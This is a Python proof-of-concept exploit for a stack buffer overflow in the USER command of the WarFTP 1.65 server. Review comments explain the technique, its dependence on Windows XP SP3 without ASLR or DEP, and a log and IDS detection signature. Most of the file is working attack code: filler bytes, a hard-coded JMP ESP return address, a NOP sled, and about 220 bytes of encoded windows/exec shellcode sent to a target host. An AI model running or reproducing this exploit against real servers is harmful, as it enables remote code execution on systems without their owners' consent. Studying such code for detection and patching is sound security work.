#!/usr/bin/env python
# Proof-of-concept for a stack buffer overflow in WarFTP 1.65's handling of the FTP
# USER command. Flat script: builds one oversized USER argument, sends it over a plain
# TCP control connection, and exits.
#
# Inputs: target host in sys.argv[1], port in sys.argv[2]. No argument validation is
# done, so a missing argument raises IndexError and a non-numeric port raises ValueError.
# Server responses are read but discarded; the final print runs unconditionally and
# says nothing about whether the overflow actually succeeded.
import socket,sys
#How To Use: python exploit.py [target] [port] or ./exploit.py [target] [port]
# Filler that reaches the saved return address: 485 bytes of 0x41 ('A').
junk = 485 * "\x41"
# Overwrites the saved return address with a fixed address inside SHELL32.dll
# (little-endian encoding of 7CB32D69, a JMP ESP gadget per the author's note).
# NOTE(review): a hard-coded module address only holds for the exact module build the
# author names below ("Windows XP SP3 En"); on systems with ASLR and DEP enabled this
# address-reuse technique would not land, which is the mitigation this class of bug
# relies on being absent.
eip = "\x69\x2D\xB3\x7C" #JMP ESP SHELL32.dll 7CB32D69
#Shellcode Payload:"windows/exec" Badchars:"\x00\x0a\x20\x40\xff" Target OS:"Windows XP SP3 En"
# About 220 bytes of encoded shellcode, assembled by repeated string concatenation.
# The author's note above lists the byte values that were excluded when encoding it.
buf = ""
buf += "\xda\xc5\xd9\x74\x24\xf4\xbf\x29\xbc\xa9\x97\x5b\x31"
buf += "\xc9\xb1\x31\x31\x7b\x18\x03\x7b\x18\x83\xc3\x2d\x5e"
buf += "\x5c\x6b\xc5\x1c\x9f\x94\x15\x41\x29\x71\x24\x41\x4d"
buf += "\xf1\x16\x71\x05\x57\x9a\xfa\x4b\x4c\x29\x8e\x43\x63"
buf += "\x9a\x25\xb2\x4a\x1b\x15\x86\xcd\x9f\x64\xdb\x2d\x9e"
buf += "\xa6\x2e\x2f\xe7\xdb\xc3\x7d\xb0\x90\x76\x92\xb5\xed"
buf += "\x4a\x19\x85\xe0\xca\xfe\x5d\x02\xfa\x50\xd6\x5d\xdc"
buf += "\x53\x3b\xd6\x55\x4c\x58\xd3\x2c\xe7\xaa\xaf\xae\x21"
buf += "\xe3\x50\x1c\x0c\xcc\xa2\x5c\x48\xea\x5c\x2b\xa0\x09"
buf += "\xe0\x2c\x77\x70\x3e\xb8\x6c\xd2\xb5\x1a\x49\xe3\x1a"
buf += "\xfc\x1a\xef\xd7\x8a\x45\xf3\xe6\x5f\xfe\x0f\x62\x5e"
buf += "\xd1\x86\x30\x45\xf5\xc3\xe3\xe4\xac\xa9\x42\x18\xae"
buf += "\x12\x3a\xbc\xa4\xbe\x2f\xcd\xe6\xd4\xae\x43\x9d\x9a"
buf += "\xb1\x5b\x9e\x8a\xd9\x6a\x15\x45\x9d\x72\xfc\x22\x51"
buf += "\x39\x5d\x02\xfa\xe4\x37\x17\x67\x17\xe2\x5b\x9e\x94"
buf += "\x07\x23\x65\x84\x6d\x26\x21\x02\x9d\x5a\x3a\xe7\xa1"
buf += "\xc9\x3b\x22\xc2\x8c\xaf\xae\x2b\x2b\x48\x54\x34"
# 40-byte NOP sled (0x90) between the overwritten return address and the shellcode.
nop = 40 * "\x90"
# Final layout: filler | return address | NOP sled | shellcode, roughly 750 bytes total.
exploit = junk + eip + nop + buf
# Each recv() drains the server's banner/response before the next command is sent;
# the returned data is never inspected.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],int(sys.argv[2])))
s.recv(1024)
# Detection note: a USER argument of ~750 bytes consisting mostly of 0x41 filler followed
# by a run of 0x90 is far outside any legitimate username and is a clear signature in
# FTP server logs or on a network IDS watching the control channel.
s.send("USER " + exploit + "\r\n")
s.recv(1024)
s.send("PASS password " + "\r\n")
s.recv(1024)
s.close()
print("\nExploit Completed :)\n")